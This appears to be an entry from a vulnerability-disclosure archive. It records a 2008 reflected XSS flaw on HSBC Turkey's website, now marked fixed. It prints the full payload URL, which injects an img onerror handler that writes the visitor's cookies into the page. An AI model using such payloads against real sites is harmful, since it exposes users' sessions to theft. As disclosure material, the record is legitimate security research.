Security researcher Babaconda, has submitted on 24/05/2008 a cross-site-scripting (XSS) vulnerability affecting www.hsbc.com.tr, which at the time of submission ranked 15253 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 25/05/2008. It is currently fixed. |
Date submitted: 24/05/2008 |
Date published: 25/05/2008 |
Date fixed: 25/06/2008 | Status: FIXED |
Author: Babaconda |
Domain: www.hsbc.com.tr |
Category: XSS |
Pagerank: 15253 |
URL: http://www.hsbc.com.tr/tr/pop_AdvantageOnay.asp?strRef=.."><img%20src=%23%20onerror="document.write( '<font%20face=verdana%20size=1>Yea%20very%20secure%20:D%20<h1>Cookies%20:</h1><br>'%2Bdocument.cooki e)"></img> |
Click here to view the mirror
|
|
|